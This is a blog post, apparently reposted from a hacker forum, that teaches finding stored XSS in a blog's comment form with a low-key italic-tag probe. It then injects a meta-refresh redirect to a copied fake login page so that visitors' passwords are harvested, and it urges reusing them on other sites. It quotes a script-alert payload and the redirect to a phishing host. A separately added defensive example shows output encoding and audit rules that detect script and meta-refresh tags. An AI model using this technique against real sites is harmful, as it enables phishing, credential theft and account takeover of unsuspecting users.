Thursday, May 17, 2012
XSS Attacks and Phishing



Website security: a basic tutorial on XSS, how to test for it, and how to use this vulnerability in a more interesting way.



OK, a lot of you know what XSS is, but some of you don't. It's basically the injection of HTML/JavaScript etc. into a form or input area. I recently used XSS in the interesting way I will present below on a blog site. OK, so you arrive on a site and you wanna be able to find out if it's vulnerable to XSS without being too suspicious. Obviously if you type
<script> javascript:alert (/owned/)</script>
in and it turns out not to work, you're gonna be conspicuous and probably end up getting banned from the site (which you may or may not care about). Anyhow, so you come to a form; this can be a shoutbox, chat area, comment form, registration page, login, etc. In this example, I'll use the comment form of a blog, since that's what I did on the blog site I recently encountered. (Of course I was nice enough to report it, but only after getting a couple passes and havin' some fun.) So try injecting
<i>Hey</i>
first; then if it doesn't go through, they might just think you were tryin' to italicize your words, just for kicks. If it goes through and in the comment area you see the words are italicized and no tags, the site is writing your input into the page as raw HTML, so presto, XSS VULNERABLE!! Okay, so now you can go ahead and do the skiddish way of XSS injection and put in your JavaScript alert. Ooor you could set up a redirection to a fake login or phishing page you set up, etc. OK, so first you go and make your fake login page on whatever host.
And of course, make it look EXACTLY like the login for the BlogSite (for example).
<html>
<head>
<meta http-equiv="Refresh" content="0;URL=http://www.myphishinpage.com/login.php">
</head>
</html>


So now every time someone views the injected blog, they'll be redirected to your fake login, which leads to them using it (thinking, oops, got logged out somehow) and giving you their login info. And if you know other sites those people go on, you can probably use the login on those too. See, a majority of people use the same password, at least, on every site they go to; I confess, I do on most sites. Soo anyway, you get my point: this is a much more effective (in my opinion) method of using XSS injections. YOU can be SKIDDISH and put in an oh-so-terrifying JavaScript alert. Orrrr you can get some good ol' passes. Your choice. Guess that's it, love ya HBH'ers. PEACE. B)
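
The defensive counterpart to the comment-form test above, as an added example that is not part of the original article: encoding comment text on output makes the italic probe, the script alert and the meta refresh render as inert text, and an audit pass flags comments that were stored before encoding was in place. The function and rule names are hypothetical, and the sample comments are constructed from the inputs quoted in the article.

```javascript
// Added example, not from the original article; all names are hypothetical.
// Constructed sample comments, reusing the inputs quoted in the article.
const SAMPLE_COMMENTS = [
  { id: 1, body: "Nice post, thanks!" },
  { id: 2, body: "<i>Hey</i>" },
  { id: 3, body: "<script> javascript:alert (/owned/)</script>" },
  { id: 4, body: '<meta http-equiv="Refresh" content="0;URL=http://www.myphishinpage.com/login.php">' },
  { id: 5, body: "a < b && b > c" }, // harmless text that still needs encoding
];

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode untrusted text for an HTML element body or a quoted attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Render one comment; every untrusted field is encoded, never concatenated raw.
function renderComment(comment) {
  return `<div class="comment" data-id="${escapeHtml(comment.id)}">${escapeHtml(comment.body)}</div>`;
}

// Audit rules for comments already in the database. A tag only starts when a
// letter directly follows "<", so "a < b" is not reported.
const RULES = [
  { name: "script-tag", re: /<script\b/i },
  { name: "meta-refresh", re: /<meta\b[^>]*http-equiv\s*=\s*["']?\s*refresh/i },
  { name: "html-tag", re: /<\/?[a-z][a-z0-9]*\b[^>]*>/i },
];

// Return [{ id, findings }] for every stored comment that contains markup.
function auditComments(comments) {
  return comments
    .map((c) => ({ id: c.id, findings: RULES.filter((r) => r.re.test(c.body)).map((r) => r.name) }))
    .filter((r) => r.findings.length > 0);
}

console.log(SAMPLE_COMMENTS.map(renderComment).join("\n"));
console.log(auditComments(SAMPLE_COMMENTS));
```

With encoding applied at render time, the italic probe shows up in the comment area with its tags visible, which is the "not vulnerable" outcome the article describes.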

Comments

CrumHacker on February 17 2007 - 02:54:22
Sorry, not as good as I had hoped. Ahh well... I was tired and lazy when I wrote this, not my best.
only_samurai on February 20 2007 - 06:16:05
Meh.....it works. And you can always edit it.
CrumHacker on February 20 2007 - 21:50:47
Yeah, I did edit a little... it's fine for now, I might add some more later.
TotcoS on February 23 2007 - 04:43:46
I liked this a lot =]
© HellBound Hackers 2008- 2009. Since 3rd December 2004.